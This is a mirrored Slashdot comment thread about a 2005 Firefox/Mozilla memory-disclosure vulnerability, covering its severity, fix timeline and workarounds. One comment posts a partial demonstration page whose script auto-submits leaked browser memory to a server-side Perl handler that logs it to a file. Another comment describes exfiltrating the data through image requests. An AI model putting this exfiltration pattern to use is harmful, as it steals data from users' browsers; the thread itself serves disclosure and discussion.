Slashdot Mirror


Mozilla / Firefox Memory Exposure Vulnerability

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

14 of 132 comments

  1. Re:Confusing write-up by cjsnell · Score: 5, Informative

    Can a remote site actually get access to this information, or is it only displayable on the screen?

    The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

    Yes, this is very dangerous.

  2. Re:Confusing write-up by orangesquid · Score: 2, Informative

    AFAIK, JavaScript could do something with this information, such as load an image that has ?randominfo appended, and this could be extracted from the server logs, or it could fill in a hidden item on a POST form that you're about to submit to be less obvious about it.

    --
    --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
  3. Re:Did the Mozilla/Firefox guys ignore a warning? by DJayC · Score: 2, Informative

    According to bugzilla it's fixed on the trunk. The last comment for the bug associated with this vulnerability says:

    Fixed on trunk, AVIARY_1_0_1_20050124_BRANCH, and MOZILLA_1_7_BRANCH.

    Thanks for the report, I hope that's the last bug from 1997 left ;-).

    /be
  4. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · Score: 5, Informative

    From the bugzilla bug report (copy it, they disallow /. links):

    Opened: 2005-04-01 13:40 PDT
    Last modified: 2005-04-01 22:39 PDT
    Resolution: FIXED

    So yes, they did: it was fixed in under 10 hours, and published 3 days later.

  5. Re:It looks like it requires Javascript by ChipMonk · Score: 2, Informative

    Only if JavaScript is completely disabled, will this attack fail. JavaScript in the [HEAD] block executes as soon as the page loads. If this code is buried in that block, it will execute without any further intervention from the user.

  6. Re:I'm shocked! by FidelCatsro · Score: 2, Informative

    From the looks of it, these problems are not affecting the rest of the OS (as far as I can tell from the explanation on Secunia). I did a few tests and it is only reading the memory area from the browser; how far into the memory it can go I do not know (does it say? The Secunia advisory is shallow on details as usual).
    Well, unlike MSIE this is a bug rather than a feature (ActiveX), and all software has bugs, but apparently it is patched so will be rolled out soon.
    Getting details on this is not the easiest, but according to the bug reports someone was saying the problem was perhaps in the browser for the last 8 years...
    ------ Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT -------

    BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:

    r=norris,waldemar
    Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
    encode & decode routines.

    Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
    hunks of that revision:

    @@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
    @@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *

    that half-fixed the original 1997-era bug.

    /be
    --
    The only things certain in war are Propaganda and Death. You can never be sure which is which though
  7. No problem here by jkerman · Score: 2, Informative

    Just displays all "XXXXXXXXXXX" for me.

    Using OS X with nightly builds auto-downloaded with FireFix (which is a really neat app).

  8. Re:Did the Mozilla/Firefox guys ignore a warning? by Anonymous Coward · Score: 3, Informative

    You can try the 1.0.3 release candidate, in which this bug is fixed, and which is due to be rolled out very soon. See here for download links.

  9. Ok, confirmed by cjsnell · Score: 4, Informative

    You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:
    <HTML>
    <HEAD>
    <TITLE>Nasty Demo</TITLE>
    </HEAD>
    <BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
    <SCRIPT language="JavaScript">
    function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
    $1.match(rx);
    return "";
    });
    x = x.replace(/^end/,"");
    return x;
    }

    function readMemory()
    {

    // First piece of readMemory() removed to satisfy Slashdot crapfilter
    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

    document.nasty.result.value = mem;

    document.nasty.submit();

    }

    </SCRIPT>
    <FORM METHOD=POST NAME='nasty'>
    <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
    </FORM>
    <BR><BR>
    </BODY>
    </HTML>

    <%args>
    $result => ''
    </%args>
    <%init>
    open(OUTFILE,'>>/tmp/outfile');
    print OUTFILE $result;
    close(OUTFILE);
    </%init>
  10. Download the latest patched version right here by OmegaGX · Score: 3, Informative

    Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/firefox-1.0+.en-US.win32.installer.exe
    I just used it and I am not vulnerable: all I see are lots of X's, just like in IE.

  11. Re:I'm shocked! by NanoGator · Score: 3, Informative

    "Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"

    It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealousy will die down.

    (Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)

    (Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)

    --
    "Derp de derp."
  12. Re:Access to firefox heap, not entire system by Anonymous Coward · Score: 1, Informative

    Seeing as many sites (including /.) require javascript to use, this really isn't a good option.

    This is bullshit. Lots of sites use Javascript, but very few sites require Javascript. Slashdot is one example of a website that uses Javascript without requiring it.

    So ignore the parent, go ahead and switch Javascript off. If you find a website that is broken, email a complaint, and, if you trust the website, enable Javascript for that one website, and switch it off again afterwards.

    As far as I can tell, the #1 problem with switching Javascript off is clueless web developers doing <a href="#" onclick... for popups which is completely unnecessary and ignorant.

  13. Re:Access to firefox heap, not entire system by TheGratefulNet · Score: 2, Informative

    Slash requires JS?

    Since when?

    I disable JS for all but 1 or 2 sites that I visit.

    Prefbar (Mozilla/Firefox) allows a single click to turn JScript on/off. Get it and use it.

    But you don't need JS for Slash. You never have.

    --
    "It is now safe to switch off your computer."
  14. Re:Did the Mozilla/Firefox guys ignore a warning? by BinLadenMyHero · Score: 2, Informative

    copy it, they disallow /. links

    Or just drag the link over the tab bar. Over an empty space (or the close button if it's full) to create a new tab, or over an existing tab to load the link there.